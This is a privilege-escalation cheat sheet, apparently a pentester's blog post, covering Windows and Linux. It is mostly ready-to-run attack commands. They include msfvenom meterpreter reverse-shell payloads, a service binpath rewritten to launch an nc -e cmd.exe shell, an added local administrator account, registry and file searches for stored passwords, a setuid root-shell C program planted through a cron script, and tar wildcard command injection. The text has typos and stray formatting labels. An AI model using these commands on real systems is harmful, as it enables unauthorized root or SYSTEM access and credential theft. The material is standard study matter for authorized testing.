Windows
Table of Contents
Kernel Exploits
system info -> look up missing kb's
systeminfo | findstr /B /C:"OS Name" /C:"OS * Version"
sherlock -> Find-AllVulns PowerShell
0xsp Mongoose
Common Kernel Exploits
- [MS16-014](https://www.exploit-db.com/exploits/40039) – applies to: Windows 7 SP1 x86
- [MS16-016](https://www.exploit-db.com/exploits/39432) – ‘WebDAV’ applies to Windows 7 SP1 x86 (Build 7601)
- [MS16-032](https://www.exploit-db.com/exploits/39719) – applies to: Windows 7 x86/x64, Windows 8 x86/64, Windows 10, Windows Server 2008-2012 R2
- [CVE-2020-0796]()-applies to SMBv3 Enabled on Windows Operation Systems
- [MS16-075](a href=”https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075“>)
- CVE-2019-1388Config files
creds in cleartext or base64 -> once windows in installed
c:\sysprep.inf c:\sysprep\sysprep.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml
GPP(Group Policy Preferences)
Only applicable for devices connected to a domain
Groups.xml stored in SYSVOL -> DC
encrypted with AES, but key got leaked
\\dc2018.lab\SYSVOL\dc2008.lab\Policies\{id}\MACHINE\Preferences\Groups
Other Files
Services\Services.xml
ScheduldedTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml
Other Misc Passwords
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /sreg query HKCU /f password /t REG_SZ /s
web.config
php.ini
httpd.conf
access.log
powerup:
- Get-WebConfig (ISS > web.config
putty:
- reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
Tight VNC:
reg query HKCU\Software\TightVNC\Server
bncpwd.exe
Always Install Elevated:
- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstalledElevated
- reg query HKCU\SOFTWARE\Policies\Micorosft\Windows\Installer\AlwaysInstalledElevated
- both values = 1, created a malicious .msi file with msfvenom for example
- execute it with msiexec /quiet /qn /i <filename>
powerup:
Get-RegistryAlwaysInstallElevated
Write-UserAddMSI
Unquoted Services Paths (trusted service paths)
For each space in a file path, Windows will attempt to look for and execute programs with a name that matches the word in front of the space.
Example:
- C:\Program Files\Some Folder\Service.exe
- C:\Program.exe
- C:\Program Files\Some.exe
- C:\Program Files\Some Folder\Service.exe
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
PFNet
* C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfscv.exe
* icalcs "C:\Program Files (x86)\Privacyware"
* msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe
Start and stop the service:
sc stop PFNet
sc start PFNET
Powerup:
Get-ServiceUnquoted
Write-ServiceBinary -Name -Path
Insecure Service Permissions
whoami > net user <name> \- enumerate groups
accesschk.exe -> part of sysinternals
accesschk.exe -ucqv <service>
accesschk.exe -uwcqv “Authenticated Users” * /accepteula
Write access to a service as an authenticated user?
sc qc upnphost
sc config upnphost binpath= “C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe”
net start upnphost
Powerup:
Get-ModifiableService
Test-ServiceDaclPermission
Invoke-ServiceAbuse -Name -Command
DLL Hijacking
Requires user interaction / reboot.
DLL search order on 32-bit systems:
1. The directory from which the application is loaded
2. 32-bit System directory (C:\Windows\System32)
3. 16-bit System directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. The current working directory
6. Directories in the PATH environment variable
Code language: JavaScript (javascript)
You can use procmon to look for vulnerable dll’s using the following filters:
- The result is NAME NOT FOUND Include
- The path ends with .dll
echo %path%
icacls C:\Python27
accesssschk.exe -dqv "C:\Python27"
sc qc IKEEXT
Generate a malicious payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<ip> lport=<port> -f dll > evil.dll
Windows 7 x86/64:
- IKE and AuthIP IPsec Keying Modules (IKEEEXT) – wlbsctrl.dl
Powerup:
Find-PathDLLHijkack
Find-ProjcessDLLHijkack
- access-allchecks
Scheduled tasks:
On servers 2000, 2003, and XP, scheduled tasks are running as a system. Are they calling any .exe‘s and can you overwrite?
accesschk.exe -dqv <folder>
Can you create a task yourself?
net start "Task Scheduler" at <hour> /interactive "path to evil exe"
Powerup:
Get-ModifiableScheduledTaskFile
Useful commands
* hostname * echo %username% * whoami / priv * swinsta \- other logged in users * net users * net user <username> * net localgroup * net localgroup Administrators * net user rottenadmin P@ssword123! /add * net localgroup Administrators rottenadmin /add * ipconfing /all * route print * arp -a * netstat -ano * C:\WINDOWS\System32\drivers\etc\hosts * schtasks /query /fo LIST /v \- scheduled task * tasklist /SVC` \- running processes * net start \- started services * cd\ & dir /b /s proof.txt
Linux
- not added -> ld_preload – [URL](http://www.dankalia.com/tutor/01005/0100501004.htm)
Scripts & Tools
- 0xsp Mongoose
- Linux-Enum-Mod
- linux-exploit-suggestor
Kernel Exploits
- Mongoose 0xsp
- uname -a -> searchsploit
- linux-exploit-suggestor
Common Kernel Exploits
* CVE-2010-2959
* cve-2020-8835
* CVE-2019-7304
* CVE-2019-9213 2018-5333
Services Running as root
- ps -aux | grep root
- any shell escape sequences?
SUID Executables
- runs with permissions of the owner
- find / -perm -u=s -type f 2>/dev/null
- any shell escape sequences – do we have to write access?
Sudo rights/users
- sudo -l
- what can we execute -> any shell escape sequences
Cron jobs
find / -perm -2 -type f 2>/dev/null
ls -la /etc/cron.d`
Code language: JavaScript (javascript)
# rootme.c
int main(void)
{
setgid(0);
setuid(0);
execl("/bin/sh", "sh", 0);
}
Code language: PHP (php)
gcc rootme.c -o rootme
echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;" > /usr/local/sbin/cron-logrotate.sh
Code language: JavaScript (javascript)
Wildcards
- often combined with user interaction/cronjobs
- cfr. Back to the Future: Unix Wildcards Gone Wild paper
- wild cards can be utilized to inject arbitrary commands by creating files that are seen as commands
Example:
--checkpoint=<number> and --checkpoint-action=<command>
--checkpoint=1 and --checkpoint-actionexec=sh rshell.sh
Code language: HTML, XML (xml)
Path Abuse (‘.’ in the path)
Requires user interaction (eg somebody need to have .
in their path)
* $PATH:.:${PATH}
* export $PATH
* echo $PATH
* replace executable files with a malicious one
Useful commands
* ps aux | grep root
* crontab -l
* ifconfig -a
* cat /etc/resolv.conf
* netstat -tulpn
* arp -e
* route
* id
* who
* cat /etc/passwd | cut -d: -f1 \- list of users
* cat ~/.ssh
* find . -name package.json -print -exec cat {} +
Code language: PHP (php)
Sources
- https://www.fuzzysecurity.com/tutorials/16.html
- https://toshellandback.com/2015/11/24/ms-priv-esc/
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- https://payatu.com/guide-linux-privilege-escalation/#
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://github.com/sagishahar/lpeworkshop
offensive security expert and founder of 0xsp security research and development (SRD), passionate about hacking and breaking stuff, coder and maintainer of 0xsp-mongoose RED, and many other open-source projects